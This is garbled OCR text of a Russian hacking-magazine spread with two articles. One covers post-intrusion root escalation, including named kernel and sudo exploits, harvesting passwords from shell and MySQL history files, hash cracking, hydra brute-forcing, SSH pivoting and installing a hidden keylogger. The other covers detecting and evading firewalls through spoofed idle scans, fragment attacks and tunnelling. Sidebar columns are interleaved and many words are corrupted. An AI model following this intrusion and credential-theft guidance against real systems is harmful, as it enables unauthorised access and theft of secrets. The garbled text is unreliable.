эксплоит проблематично в отсутствие 
рабочего компилятора (06 этой ситуа- 
ции я расскажу чуть ниже). 

Давай определимся, с каких шагов 
лучше всего начинать атаку. Как 
только получен нормальный шелл, 
нужно выполнить ряд команд, чтобы 
определить дальнейшую тактику 
взлома. Во-первых, следует набрать 
uname -а и узнать версию операцион- 


ки. Если это Linux, можно вывести на у 
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и ознакомь- 
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группы. Ре- 
бята пишут 
очень инте- 
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щи. 


Пароль для 
MySQL 
можно най- 
ти в 
-bash_histo- 
гу, потому 
что админы 
часто вби- 
вают его 
прямо в ко- 
мандной 
строке 
(mysql -h 
хост -и user 
=рПароль). 


Если за 
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зуй команду 
mysql -рпа- 
роль -е 
‘select * 
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НЕПРИСТУПНЫЙ 


При жела- 
нии брут- 
форс можно 
написать 
самостоя- 
тельно. 
Достаточно 
знать про- 
токол обме- 
на (между 
клиентом и 
сервером) и 
немного 
владеть 
языком 
программи- 
рования. 


Ошибка адми- 
на приводит к 
фатальному 


@7 взлом 


АТАКА ИНТЕЛЛЕКТА ) 


печать файл /etc/*-release и посмот- 
реть конечного производителя систе- 
мы. В случае если взломщик наткнул- 
ся на новую FreeBAS, ему стоит за- 
быть об эксплоитах. Ha фришные сер- 
висы рабочих новинок не было очень 
давно. А какую-нибудь SunOS, наобо- 
рот, очень легко взломать, эксплоиты 
есть и для последних релизов. 

К примеру, после вывода uname -а 
bash показал, что система вертится Ha 
ядре 2.4.20-smp. Это означает, что ха- 
кер поимел хорошую двухпроцессор- 
ную тачку. Только вот ядро у этой ма- 
шины не такое уж и хорошее. Можно 
провести атаку эксплоитом 15ес- 
ptrace.c и быстро получить рутовые 
привилегии. Для этого даже не нужен 
псевдотерминал, который настоятель- 
но требовали предыдущие эксплоиты 
рЁгасе-уязвимости. Что касается 
Solaris, то ее ядро пробивается с одно- 
го удара. Существует сплоит, позволя- 
ющий подгрузить модуль с произ- 
вольным кодом. Подгрузка, как ты уже 
догадался, производится от обычных 
юзерских прав, которые ты получил 
после успешной удаленной атаки. 

В случае, когда встречается ядрышко 
постабильнее, например, 2.6.7 или 
2.4.20, но с префиксом -дгзесиге, мож- 
HO не питать надежду на то, что кернел 
возьмется обычным ргасе-эксплойтом. 
В такой ситуации хакер даже не тратит 
времени на поиски эксплоита, ибо зна- 
ет, что патчи и свежие релизы уже не 
содержат старых багов. 

Бывает, что на машине вертится 
секьюрное ядро, но также очень баж- 
ные бинарники. Например, я встре- 
чался с Linux RedHat 7.3 с патчем от 
grsecurity, но уязвимым приложением 
/usr/sbin/sudo. При таком раскладе я 
желал получить рута после приме- 
нения эксплоита hudo.c, но обломал- 
ся. Дело в том, что сервер, являлся 
хостингом, поэтому всем юзерам 
прикрывался доступ к /usr/bin/gcc. Я 
оценил защиту админа, затем ском- 
пилил эксплоит на другом пингвине 
и перетащил бинарник на хостинго- 
вую машину. Оставалось запустить 
приложение и наслаждаться руто- 
выми правами. 

Думаю, смысл ты уловил. Если на 
сервере есть уязвимые бинарники 
или старое ядро - ноги в руки и бегом 
на сайты по безопасности за свежими 
(или чуть протухшими) эксплоитами. 
На машине свежая система и напрочь 
отсутствуют суидные приложения? 
Тогда придется попробовать другой 
способ локального нападения. 


СИЛА НЛП 


ПОИСК! ТОЛЬКО ПОИСК! 

Другой метод повышения приви- 
легий заключается в поиске секретной 
информации. Нет, совсем необязатель- 
но отыскивать различные документы, 
нужно просто определить наличие в 
системе парольных хэшей. Часто паро- 
ли встречаются в файлах .htpasswd, 
они находятся в web-30He. Поиск осу- 
ществляется командой locate .htpass- 
wd. Бывает, что документ не только 
открыт на чтение, но и содержит в себе 
рутовый хэш, который легко расшифр- 
ровать с помощью John The Ripper. По- 
мимо списка .htpasswd можно запро- 
сить конфиги .htaccess, а затем прочи- 
тать их. Бывает, что юзер сохраняет па- 
роли в файле с произвольным именем. 
Последнее легко узнать по значению 
директивы UserFile в httpd.conf. 

Конориги от Web - это лишь верхуш- 
ка айсберга. Настоящая сила находит- 
ся в логах! Если поиск по Web ничего 
не дал, стоит попробовать поискать 


Быстрый взлом ядра 
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Нужны пароли? Без проблем! 


читабельные файлы .bash_history и 
-mysql_history. В первом из них можно 
обнаружить пароль для суперпользо- 
вателя. Случается, что администратор 
написал неверную команду SU (Sy или 
si), а затем вслепую BONN рутовый па- 
роль. Пароль, конечно же, сохранится 
в логе команд. Находка для хакера, не 
так ли? Кроме этого, возможен слу- 
чай, при котором администратор логи- 
нится к MySQL, используя системный 
пароль. Таких случаев очень много, 
наверное, каждый третий локальный 
взлом происходит благодаря хороше- 
му урожаю из лога команд :). 

Теперь поговорим о MySQL. Доступ к 
базе - это тоже своего рода дополни- 
тельные права. Ведь в БД могут со- 
держаться таблицы с кредитными кар- 
тами, аккаунтами на какие-либо серви- 
сы и т.п. Слюнки потекли? Еще бы :). 
Чтобы достать пароль от базы, особо 
париться не надо. В первую очередь 
нужно изучить РНР/СС|-скрипты Ha 
предмет конфигурационных файлов. 
Например, часто переменные доступа 
записываются в конфиг include.php.inc 
либо тузаМпс. Второй способ узнать 
пароль - прочитать .mysql_history. 
Очень часто администратор светит 
пассвора в чистом виде после выпол- 
нения команды «blabla set 
password=password(‘naponb’)». Нако- 
нец, если не повезло, можно заняться 
локальным бруторорсом: залить на ма- 
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Отличная работа модуля 


шину hydra и прогнать вордлист для сервиса mysql. Ведь, 
как известно, надежда умирает последней :). 


ПОШПИОНИМ? 

и Итак, настал тот заветный момент, когда получены аб- 
солютные привилегии. Но на этом приключения не закон- 
чены. Обычно после взлома хакер определяется с даль- 
нейшей тактикой: либо он троянит машину и «ложится на 
дно», пибо атакует дальше в надежде заполучить более 
вкусный кусок, чем права рута. Я говорю о взломе локаль- 
ной сети, которой владеть куда интереснее, чем обитать на 
маршрутизаторе. Но для того чтобы продвинуться вперед, 
взломщику необходимо узнать пароли на других серверах. 
Это проще всего сделать двумя способами: 

@. Найти информацию об $$Н-соединениях. Эти данные 
находятся в файле ~user/.ssh/.known_hosts. Пропарсив 
этот конфиг, можно приконнектиться на любой хост из 
списка. Пароль на соединение с большой вероятностью 
совпадет с системным, который можно без проблем рас- 
шифровать. А если у юзера имеются $$Н-ключики, то с по- 
мощью простого суида взломщик способен соединиться с 
узлом без дополнительной авторизации. Правда, следует 
помнить, что в случае защиты ключа секретной фразой, ее 
можно легко расшисфровать путем брутфорса по cnoBap- 
ному листу. В этом злоумышленнику поможет утилита SSH 
Crack (www.thc.org/root/tools/thc_ssh_crack.c). 

©. Установить Ha сервер сниффер или клавиатурный шпи- 
он. С помощью снифингаа можно легко отловить пароль 
на ЕТР- или РОРЗ-сервис, а затем попробовать аккаунт в 
качестве системного. 

С помощью специального модуля можно перехватить все 
консольные команды, включая пароли на SSH. Самый луч- 
ший клавиатурный логгер - vlogger от THC (www.tic.org/cown 
load.php?t=ral=vlogger-2.\.. tar.gz). После загрузки модуль стирает 
себя из списка процессов, а затем работает в одном из 
двух режимов: логирование всего ввода или запись паро- 
лей (smart mode). В любом случае взломщику удастся на- 
рыть достаточно индрормации, которой хватит для взлома 
всех станций локальной сети! 


ВЫВОДЫ 

m Вот, собственно, и все основные удаленные и ло- 
кальные атаки. Обычно именно эти методы и приносят 
взломщику успех. Ведь он точно знает, что брутфорс 
намного опаснее, чем сканирование портов, но когда ни- 
чего не остается делать, приходится довольствоваться 
самыми неблагодарными способами взлома. Матерый 
взломщик с помощью пары команд определит, что сис- 
тема не имеет тривиальных уязвимостей и получить ру- 
та в ней будет очень непростым делом. Но после двух- 
часового поиска злоумышленник быстро найдет пароль 
суперпользователя, записанный в р!ат-тексте. Если ты 
думаешь, что у крутого хакера дар определять методы 
взлома, то ошибаешься. В свое время он был скриптки- 
ди, и лишь через несколько лет, набравшись опыта, 
постиг искусство взлома. МЕ 
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СТЕНКА ВСМЯТКУ 


жения втор- 
жений в 09- 
ном флако- 
не. 


как извне, так и изнутри сети, и реша- 
ющих, как с ними поступить - пропус- 
тить дальше или уничтожить, при не- 
обходимости уведомив отправителя, 
что его пакет сдох. Большинство 
брандмауэров этого типа работает на 
|Р-уровне, причем полнота поддержки 
|Р-протокола и качество сфильтрации 
оставляют желать лучшего, поэтому 
атакующий может легко их обмануть. 
На домашних компьютерах такие 
брандмауэры еще имеют смысл, но 
при наличии даже плохенького марш- 
рутизатора они лишь удорожают сис- 
тему, ничего не давая взамен, так как 
те же самые правила фильтрации па- 
кетов можно задать и на маршрутиза- 
торе! 

Программные прокси представляют 
собой обычные прокси-сервера, прос- 
лушивающие заданные порты (напри- 
мер, 25, ПО, 80) и поддерживающие 
взаимодействие с заранее оговорен- 
ным перечнем сетевых сервисов. В от- 
личие от фильтров, передающих |P- 
пакеты "как есть", прокси самостоя- 
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ния вторжений (Intruder Detection 
System, IDS), анализирующую харак- 
тер сетевых запросов и выявляющую 
потенциально опасные действия - об- 
ращение к несуществующим портам 
(характерно для сканирования), паке- 
ты с TTL, равным единице, (характер- 
но для трассировки) и т.д. Все это су- 
щественно затрудняет атаку, и хакеру 
приходится действовать очень осто- 
рожно, поскольку любой неверный 
шаг тут же выдаст его с поторохами. 
Однако интеллектуальность интегри- 
рованных систем распознавания goc- 
таточна невелика, и большинство 
уважающих себя администраторов 
перекладывает эту задачу на плечи 


>< 
1 СТЕНКА 
* 
Ss 
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= 
Cc 
> 
= 
о 
= ОБХОД БРАНДМАУЭРОВ СНАРУЖИ И ИЗНУТРИ 
|= 
ш ольшинство корпоративных сетей ограждено по периметру недемократично настроенными брандмауэрами, 
= [5 защищающими внутренних пользователей OT самих себя и отпугивающими начинающих хакеров. Между тем, для 
опытного взломщика даже качественный и грамотно настроенный брандмауэр - не преграда. 
ь. 
ВВЕДЕНИЕ тельно собирают ТСР-пакеты, выкусы- = специализированных пакетов, таких, 
и Брандмауэр (он же вают из них пользовательские дан- как Real Secure от Internet Security 
фаервол) в общем cny- ные, наклеивают на них новый заго- System. 
чае представляет со- ловок и вновь разбирают полученный В зависимости от конфигурации се- 
бой совокупность сис- пакет Ha IP, при необходимости осу- ти брандмауэр может быть установ- 
тем, обеспечивающих надлежащий ществляя трансляцию адресов. Если лен на выделенный компьютер или 
уровень разграничения доступа, goc- брандмауэр не содержит ошибок, об- может делить системные ресурсы с 
тигаемый путем управления проходя- мануть его на сетевом уровне уже не кем-нибудь еще. Персональные 
щим трафиком по более или менее удастся; к тому же, он скрывает от брандмауэры, широко распространен- 
6 раномауэ- гибкому набору критериев (правил атакующего структуру внутренней се- ные в мире Windows, в подавляющем 
ры подвер- поведения). Короче говоря, брандмау- ти - снаружи остается лишь брандма- — большинстве случаев устанавливают- 
вы fom эр пропускает только ту часть Tpacpu- yap. А для достижения наивысшей за- ся непосредственно на сам защищае- 
честву DoS- ка, которая явно разрешена админи- щищенности администратор может мый компьютер. Если этот пакетный 
атак, таких, стратором и блокирует все остальное. организовать на брандмауэре допол- фильтр реализован без ошибок, то 
ИИ На рынке доминируют два типа нительные процедуры авторизации и защищенность системы ничуть не 
SYN-flood, брандмауэров - пакетные фильтры, аутентификации, «набрасывающие- страдает и атаковать ее так же слож- 
Cane Homie также называемые шлюзами сфильт- ся» на противника еще на дальних ру- но, как и на выделенном брандмауэре. 
ципе неспо- рации пакетов (packet filter gateway), бежах обороны. Это были достоин- Локальные программные прокси за- 
cotta ne и программные прокси (application ства. Что же касается недостатков, то щищают компьютер лишь от некото- 
i: proxy). Примером первого типа явля- программные прокси ограничивают рых типов атак (например, блокируют 
ется Firewall от компании Check Point, пользователей в выборе приложений. засылку троянов через IE), оставляя 
а второго - Microsoft Proxy Server. Они работают намного медленнее па- систему полностью открытой. В UNIX- 
Пакетные фильтры полностью проз- кетных фильтров и здорово снижают ИКе-системах пакетный фильтр прису- 
рачны для пользователей и весьма производительность (особенно на тствует изначально, а в штатный 
ое Б производительны, однако недостаточ- — быстрых каналах). комплект поставки входит большое 
рутизатор, но надежны. Фактически они Npegc- Брандмауэры обоих типов обычно количество разнообразных прокси- 
ие тавляют собой разновидность марш- включают в себя более или менее серверов, поэтому приобретать go- 
ма обнару- рутизаторов, принимающих пакеты урезанную версию системы определе- полнительное программное обеспече- 


ние не нужно. 


ОТ ЧЕГО ЗАЩИЩАЕТ 
И ОТ ЧЕГО НЕ ЗАЩИЩАЕТ 
БРАНДМАУЭР 

и Пакетные фильтры в общем слу- 
чае позволяют закрывать все входя- 
щие/исходящие ТСР-порты, пол- 
ностью или частично блокировать не- 
которые протоколы (например, ICMP), 
препятствовать установке соедине- 
ний с данными IP-agpecamu и т.д. Пра- 
вильно сконфигурированная сеть 
должна состоять, по меньшей мере, 
из двух зон: внутренней корпоратив- 
ной сети (corporative network), ограж- 
денной брандмауэром и населенной 


рабочими станциями, сетевыми прин- 
терами, intranet-cepBepamu, серверами 
баз данных и прочими ресурсами по- 
добного типа; а также демилитаризо- 
ванной зоны (demilitarized zone, или, 
сокращенно, DMZ), в которой распо- 
ложены публичные сервера, доступ- 
ные из интернета. Брандмауэр, наст- 
роенный на наиболее драконический 
уровень защищенности, должен: 

- закрывать все порты, кроме тех, 
что принадлежат публичным сетевым 
службам (HTTP, FTP, SMTP ит.д.); 

- пакеты, приходящие Ha задан- 
ный порт, отправлять тем и только 
тем узлам, на которых установлены 
соответствующие службы (напри- 
мер, если WWW-cepBep расположен 
на узле А, а ЕТР-сервер на узле В, 
то пакет, направленный на 80 порт 
узла В, должен блокироваться 
брандмауэром); 


- блокировать входящие соединения 
из внешней сети, направленные в 
корпоративную сеть (правда, в этом 
случае пользователи сети не смогут 
работать с внешними ЕТР-серверами 
в активном режиме); 

- блокировать исходящие соедине- 
ния из DMZ-30HbI, направленные BO 
внутреннюю сеть (исключая ЕТР- и 
DNS-cepBepa, которым исходящие со- 
единения необходимы); 

- блокировать входящие соединения 
из ОМ7-зоны, направленные во внут- 
реннюю сеть (если этого не сделать, 
то атакующий, захвативший управле- 
ние одним из публичных серверов, 
беспрепятственно проникнет и в кор- 
поративную сеть). 

- блокировать входящие соединения 
в DMZ-30Hy из внешней сети по слу- 
жебным протоколам, часто использу- 
ющимся для атаки (например, ICMP; 


ССЫЛКИ ПО ТЕМЕ 


правда, полное блокирование ICMP 
создает большие проблемы, в част- 
ности, перестает работать ping и ста- 
новится невозможным автоматичес- 
кое определение наиболее предпоч- 
тительного MTU); 

- блокировать входящие/исходящие 
соединения с портами и/или IP-agpe- 
сами внешней сети, заданными адми- 
нистратором. 

Фактически роль брандмауэра сво- 
дится к ограждению корпоративной 
сети от всяких любопытствующих, 
блуждающих по просторам инета. Тем 
не менее, прочность этого огражде- 
ния только кажущаяся. Если клиент 
корпоративной сети использует уяз- 
вимую версию браузера или клиента 
электронной почты (а большая часть 
программного обеспечения уязвима!), 
атакующему достаточно заманить его 
на троянизированную \МЕВ-страничку 
или послать ему письмо с вирусом 
внутри, и через короткое время ло- 
кальная сеть окажется поражена. Да- 
же если исходящие соединения из 
корпоративной сети запрещены, shell- 
код сможет воспользоваться уже ус- 
тановленным ТСР-соединением, через 
которое он был заброшен на атако- 
ванный узел, передавая хакеру уп- 
равление удаленной системой. 

Брандмауэр может и сам являться 
объектом атаки, ведь он, как и всякая 
сложная программа, не обходится без 
дыр и уязвимостей. Дыры в брандмау- 
эрах обнаруживаются практически 
каждый год и далеко не сразу затыка- 
ются (особенно если брандмауэр реа- 
лизован на "железном" уровне). За- 
бавно, но плохой брандмауэр не толь- 
ко не увеличивает, но даже ухудшает 
защищенность системы (в первую 
очередь это относится к персональ- 
ным брандмауэрам, популярность ко- 
торых в последнее время необычайно 
высока). 


ОБНАРУЖЕНИЕ 
И ИДЕНТИФИКАЦИЯ 
БРАНДМАУЭРА 
Залогом успешной атаки являет- 

ся своевременное обнаружение и 
идентификация брандмауэра (или, в 
общем случае, IDS, но в контексте 
настоящей статьи мы будем исходить 
из того, что она совмещена с бранд- 
мауэром). 

Большинство брандмауэров отбра- 
сывают пакеты с истечением TTL 
(Time То Live - время жизни), блоки- 


руя тем самым трассировку маршрута, » 


Брандмауэ- 
ры не за- 
щищают от 
атак, а 
лишь ог- 
раждают 
локальную 
сеть кир- 
пичным за- 
бором, че- 
рез который 
легко пере- 
лезть. 


В большин- 
стве случа- 
ев сквозь 
кирпичную 
стену 
брандмауэ- 
ра можно 
пробить 
1СМР-тон- 
нель, обер- 
нув переда- 
ваемые дан- 
ные 1СМР- 
заголовком. 


Брандмауэр 
можно ата- 
ковать не 
только изв- 
не, но и из- 
нутри кор- 
поративной 
сети. 
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НЕПРИСТУПНЫЙ 


Различные 
брандмауэ- 
ры по-раз- 
ному реаги- 
руют на 
нестандарт- 
ные ТСР- 
пакеты, 
позволяя 
идентифи- 
цировать 
себя. 


Брандмауэ- 
ры, откры- 

вающие 53 
порт (служ- 
6a DNS) не 

только Ha 


приемнике 
(например, 
Check Point 
Firewall), Ho 
и Ha источ- 
нике, позво- 
ляют хаке- 
ру проска- 
нировать 
всю внут- 
реннюю 
сеть. 


Уязвимость 
програм- 
мных прок- 
си в общем 
случае не- 
велика, и в 
основном 
они атаку- 
ются через 
ошибки пе- 
реполнения 
буфера. 


@7 взлом 
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ТРАССИРОВКА МАРШРУТА, УМИРАЮЩАЯ НА 


БРАНДМАУЭРЕ (МАРШРУТИЗАТОРЕ) 


чем разоблачают себя. Аналогичным 
образом поступают и некоторые 
маршрутизаторы, однако, как уже го- 
ворилось выше, между маршрутиза- 
тором и пакетным фильтром нет прин- 
ципиальной разницы. 

Отслеживание маршрута обычно 
осуществляется утилитой traceroute, 
поддерживающей трассировку через 
протоколы ICMP и UDP, причем ICMP 
блокируется гораздо чаще. Выбрав 
узел, заведомо защищенный бранд- 
мауэром, попробуем отследить к нему 
маршрут командой traceroute -1 
wwww.intel.ru. 

Смотри: трассировка доходит до y3- 
na 192.198.138.68, а затем умирает, что 
указывает либо на брандмауэр, либо 
на недемократичный маршрутизатор. 
Чуть позже мы покажем, как можно 
проникнуть сквозь него, а пока выбе- 


рем для трассировки другой узел, 
например, 

На этот раз трассировка проходит 
нормально. Выходит, что никакого 
брандмауэра вокруг zenon'a нет? 
Очень может быть, но для уверенно- 
го ответа нам требуется дополни- 
тельная информация. Узел 
195.2.91193 принадлежит сети класса 
С (три старших бита IP-agpeca равны 
110), и, если эта сеть не защищена 
брандмауэром, большинство ее уз- 
лов должно откликаться Ha ping, что 
в данном случае и происходит. Скани- 
рование выявляет 65 открытых адре- 
сов. Следовательно, либо маршрути- 
затора здесь нет, либо он беспрепят- 
ственно пропускает наш ping. 

При желании можно попробовать 
просканировать порты, однако, во- 
первых, наличие открытых портов 


УСПЕШНОЕ ЗАВЕРШЕНИЕ ТРАССИРОВКИ ЕЩЕ НЕ ЕСТЬ 


СВИДЕТЕЛЬСТВО ОТСУТСТВИЯ БРАНДМАУЭРА 
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еще ни о чем не говорит (быть может, 
брандмауэр блокирует лишь один 
порт, но самый нужный, например, за- 
щищает дырявый RPC от посяга- 
тельств извне), а, во-вторых, при ска- 
нировании хакеру будет трудно ос- 
таться незамеченным. С другой сторо- 
ны, порты сканируют все кому не 
лень, и администраторы уже давно не 
обращают на это внимания. 

Утилита птар позволяет обнаружи- 
вать некоторые из брандмауэров, ус- 
танавливая статут порта Bo "fire- 
walled". Такое происходит всякий раз, 
когда в ответ на SYN удаленный узел 
возвращает ICMP-nakeT типа 3 с ко- 
дом 13 (Admin Prohibited Filter) с 
действительным IP-agpecom брандма- 
уэра в заголовке (nmap его не отобра- 
жает; пиши собственный сканер или, 
используя любой снифер, самостоя- 
тельно проанализируй возвращае- 
мый пакет). Если возвратится 
SYN/ACK - сканируемый порт отрыт. 
RST/ACK указывает на закрытый или 
заблокированный брандмауэром порт. 
Не все брандмауэры генерируют 
RST/ACK при попытке подключения к 
заблокированным портам (Check Point 
Firewall - генерирует), некоторые от- 
сылают !СМР-сообщение, как было по- 
казано выше, или ничего не посыла- 
ют вообще. 

Большинство брандмауэров поддер- 
живает удаленное управление через 
интернет, открывая один или несколь- 
ко ТСР-портов, уникальных для каж- 
дого брандмауэра. Так, например, 
Check Point Firewall открывает 256, 
257 и 258 порты, a Microsoft Proxy - 
1080. Некоторые брандмауэры явным 
образом сообщают свое имя и версию 
программного продукта при подклю- 
чении к ним по netcat (или telnet), в 
особенности этим грешат прокси-сер- 
вера. Последовательно опрашивая 
все узлы, расположенные впереди ис- 
следуемого хоста, на предмет прослу- 
шивания характерных для брандмауэ- 
ров портов, мы в большинстве случа- 
ев сможет не только выявить их при- 
сутствие, но и определить IP-agpec! 
Разумеется, эти порты могут быть зак- 
рыты как на самом брандмауэре 
(правда, не все брандмауэры это поз- 
воляют), так и на предшествующем 
ему маршрутизаторе (но тогда бранд- 
мауэром будет нельзя управлять че- 
рез интернет). 
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СКАНИРОВАНИЕ И 
ТРАССИРОВКА ЧЕРЕЗ 
БРАНДМАУЭР 

и Прямая трассировка через бранод- 
мауэр чаще всего оказывается невоз- 
можной (какому администратору при- 
ятно раскрывать интимные подроб- 
ности топологии своих сетей), и атаку- 
ющему приходится прибегать к все- 
возможным ухищрениям. 

Утилита Firewalk представляет собой 
классический трассер, посылающий 
TCP- или УОР-пакеты, с таким расчетом, 
чтобы на узле, следующем непосред- 
ственно за брандмауэром, их TTL обра- 
щался в ноль, заставляя систему гене- 
рировать сообщение 
ICMP_TIME_EXCEEDED. Благодаря это- 
му Firewalk уверенно работает даже 
там, где штатные средства уже не 
справляются, хотя крепко защищенный 
брандмауэр ей, конечно, не пробить и 
атакующему приходится использовать 
более продвинутые алгоритмы. 

Будем исходить из того, что с каж- 
дым отправляемым 1Р-пакетом система 
увеличивает его ID на единицу (как 
это чаще всего и случается). С другой 
стороны, согласно спецификации RFC- 
793, описывающей ТСР-протокол, вся- 
кий хост, получивший посторонний па- 
кет, который не относится к установ- 
ленным ТСР-соединениям, должен ре- 
агировать на него посылкой RST. Для 
реализации атаки нам понадобится 
удаленный узел, не обрабатывающий 
в данный момент никакого посторон- 
него траффика и генерирующий Npegc- 
казуемую последовательность ID. В 
хакерских кругах такой узел называет- 
ся немым (dump). Обнаружить немой 
хост очень просто - достаточно лишь 
отправить ему серию Р-пакетов и про- 
анализировать ID, возвращенный в 
заголовках. Запомним (запишем на бу- 
мажку) ID последнего пакета. Затем 
выберем жертву и отправим ей SYN- 
пакет, указав в обратном адресе IP He- 
мого узла. Атакуемый узел, думая, что 
немой хост хочет установить с ним 
ТСР-соединение, ответит: SYN/ACK. 
Немой хост, словив посторонний 
SYN/ACK, возвратит RST, увеличивая 


свой счетчик ID на единицу. Отправив 
немому хосту еще один IP-nakeT и про- 
анализировав возвращенный ID, мы 
сможем узнать, посылал ли немой 
хост жертве RST-naketT или нет. Если 
посылал, значит, атакуемый хост акти- 
вен и подтверждает установку ТСР-со- 
единения на заданный порт. При же- 
лании хакер может просканировать 
все интересующие его порты, не рис- 
куя оказаться замеченным, ведь вы- 
числить его |Р практически невозмож- 
но - сканирование осуществляется 
"руками" немого узла и с точки зрения 
атакуемого выглядит как обычное 
$\№-сканирование. 

Предположим, что немой хост распо- 
ложен внутри DMZ, а жертва находит- 
ся внутри корпоративной сети. Тогда, 
отправив немому хосту SYN-nakeT OT 
имени жертвы, мы сможем проник- 
нуть через брандмауэр, поскольку он 
будет думать, что с ним устанавлива- 
ет соединение внутренний хост, а сое- 
динения этого типа в 99,9% случаях 
разрешены (если их запретить, поль- 
зователи корпоративной сети не смо- 
гут работать со своим же собственны- 
ми публичными серверами). Естест- 
венно, все маршрутизаторы на пути 
от хакера к немому хосту не должны 
блокировать пакет с поддельным об- 
ратным адресом, в противном случае 
пакет умрет задолго до того, как добе- 
рется gO места назначения. 

Утилита hping как раз и реализует 
сценарий сканирования данного типа, 
что делает ее основным орудием зло- 
умышленника для исследования кор- 
поративных сетей, огражденных 
брандмауэром. 

Как вариант, хакер может захватить 
один из узлов, расположенных внут- 
ри DMZ, используя их как плацдарм 
для дальнейших атак. 


ПРОНИКНОВЕНИЕ ЧЕРЕЗ 
БРАНДМАУЭР 

и Сборку фрагментированных ТСР- 
пакетов поддерживают только самые 
качественные из брандмауэров, а все 
остальные анализируют лишь первый 
фрагмент, беспрепятственно пропус- у 
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Некоторые 
брандмауэ- 
ры подвер- 
жены неса- 
нкциониро- 
ванному 
просмотру 
файлов че- 
рез порт 
8010 и зап- 
росы типа 
http://www. 
host.com::8 
010/c:/ или 
http://www. 
host.com::8 
010//. 


Cnym6a 
DCOM нуж- 
дается в 
широком 
диапазоне 
открытых 
портов, что 
существен- 
но снижает 
степень за- 
щищеннос- 
ти системы, 
обессмыс- 
ливая ис- 
пользование 
брандмауэ- 
ра. 


СТЕНКА ВСМЯТКУ 


Структура ТСР-пакета 


кая все остальные. Послав сильно 
сррагментированный ТСР-пакет, "раз- 
мазывающий" ТСР-заголовок по нес- 
кольким |Р-пакетам, хакер скроет от 
брандмауэра Acknowledgment Number 
и он не сможет определить принад- 
лежность ТСР-пакета к соответствую- 
щей ему ТСР-сессии (быть может, он 
относится к легальному соединению, 
установленному корпоративным 
пользователем). Если только на 
брандмауэре не активирована опция 
"резать сфрагментированные пакеты", 
успех хакерской операции гарантиро- 
ван. Блокирование сфрагментирован- 
ных пакетов создает множество проб- 
лем и препятствует нормальной рабо- 
те сети. Теоретически возможно бло- 
кировать лишь пакеты с фрагменти- 
рованным ТСР-заголовком, однако да- 
neko не всякий брандмауэр поддер- 
живает столь гибкую политику наст- 
ройки. Атаки данного типа, называе- 
мые Tiny Fragment Attack, обладают 
чрезвычайно мощной проникающей 
способностью и потому являются из- 
любленным приемом всех хакеров. 
Атаки с использованием внутренней 
маршрутизации (она же маршрутиза- 
ция от источника, или source routing) 
намного менее актуальны, но мы все 
же их рассмотрим. Как известно, |Р- 
протокол позволяет включать в пакет 
информацию о маршрутизации. При 
отправке |Р-пакета жертве навязанная 
хакером маршрутизация чаще всего 


игнорируется, и траектория перемеще- 
ния пакета определяется исключи- 
тельно промежуточными маршрутиза- 
торами, но ответные пакеты возвра- 
щаются по маршруту, обратному ука- 
занному в |Р-заголовке, что создает 
благоприятные условия gna его nog- 
мены. Более упрощенный вариант ата- 
ки ограничивается одной лишь подме- 
ной |Р-адреса отправителя. Грамотно 
настроенные маршрутизаторы (и 
большинство клонов UNIX) блокируют 
пакеты с внутренней маршрутизацией. 
Пакеты с поддельными [Р-адресами 
представляют несколько большую 
проблему, однако качественный 
брандмауэр позволяет отсеивать и их. 

Таблицы маршрутизации могут быть 
динамически изменены посылкой со- 
общения ICMP Redirect, что позволя- 
ет (по крайней мере, теоретически) 
направить хакерский трасрик в обход 
брандмауэра (см. также ARP-spoofing), 
впрочем, сейчас такие безнадежно 
инсекьюрные системы практически 
уже не встречаются. 


ПОБЕГ ИЗ-ЗА БРАНДМАУЭРА 

и Пользователи внутренней сети, 
огражденной недемократичным 
брандмауэром, серьезно ограничены 
в своих возможностях. Про невоз- 
можность работы с ЕТР-серверами в 
активном режиме мы уже говорили. 
Также могут быть запрещены некото- 
рые протоколы и закрыты необходи- 
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мые тебе порты. В клинических случа- 
ях администраторы ведут черные 
списки |Р-адресов, блокируя доступ к 
сайтам "нецелесообразной" тематики. 

Поскольку брандмауэры рассчита- 
ны на защиту извне, а не изнутри, 
вырваться из-за их застенков очень 
просто, достаточно лишь восполь- 
зоваться любым подходящим прок- 
си-сервером, находящимся во внеш- 
ней сети и еще не занесенным ад- 
министратором в черный список. В 
частности, популярный клиент ICQ 
позволяет обмениваться сообщени- 
ями не напрямую, а через сервер 
(не обязательно сервер компании- 
разработчика). Существуют тысячи 
серверов, поддерживающих работу 
ICQ. Одни существуют в более или 
менее неизменном виде уже нес- 
колько лет, другие динамически то 
появляются, то исчезают. И если 
"долгожителей" еще реально занес- 
ти в стоп-лист, то уследить за сер- 
верами-однодневками администра- 
тор просто не в состоянии! 

Также можно воспользоваться 
протоколом SSH (Secure Shell), из- 
начально спроектированным для 
работы через брандмауэр и поддер- 
живающим шифрование трафика 
(на тот случай, если брандмауэр 
вздумает искать в нем "запрещен- 
ные" слова типа "sex", "hack" и T.g.). 
SSH-npoTokon может работать по 
любому доступному порту, напри- 
мер, 80, и тогда с точки зрения 
брандмауэра все будет выглядеть 
как легальная работа с WEB-cepsBe- 
ром. Между тем, SSH является лишь 
фундаментом для остальных прото- 
KONOB, из которых в первую оче- 
редь хотелось бы отметить telnet, 
обеспечивающий взаимодействие с 
удаленными терминалами. Заплатив 
порядка 20S за хостинг любому 
провайдеру, ты получишь аккаунт, 
поддерживающий SSH и позволяю- 
щий устанавливать соединения с 
другими узлами сети (бесплатные 
хостинги этой возможности чаще 
всего лишены или накладывают на 
нее жесткие ограничения). 

Наконец, можно воспользоваться 
сотовой телесронией, прямым модем- 
ным подключением и прочими комму- 
никационными средствами, устанав- 
ливающими соединение с провайде- 
ром, в обход брандмауэра. 


ЗАКЛЮЧЕНИЕ 

и Технологии построения брандмау- 
эров не стоят на месте, и специалисты 
по информационной безопасности не 
дремлют. С каждым днем хакерство- 
вать становится все труднее и Tpyg- 
нее, однако полностью хакерство не 
исчезнет никогда. Ведь на смену затк- 
нутым дырам приходят другие. Глав- 
ное, не сидеть сложа руки, а творчес- 
ки экспериментировать с брандмау?э- 
рами, изучать стандарты и специфи- 
кации, изучать дизассемблерные лис- 
тинги и искать, искать, искать... 
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fer" являет- 
ся торговой 
маркой ком- 
пании 
Network 
Associates, 
распростра- 
няющей се- 
тевой ана- 
лизатор 
"Sniffer(r) 
Network 
Analyzer". 


в отношении других программ с юри- 
дической точки неправомерно, но... 
ХЕКОХ тоже торговая марка, а в прос- 
торечии все копировальные аппараты 
независимо от производителя назы- 
вают "ксероксами", и никто от этого 
еще не пострадал. 

Объектом атаки могут выступать: ло- 
кальная сеть (как хабовой, так и свит- 
чевой архитектуры), глобальная сеть 
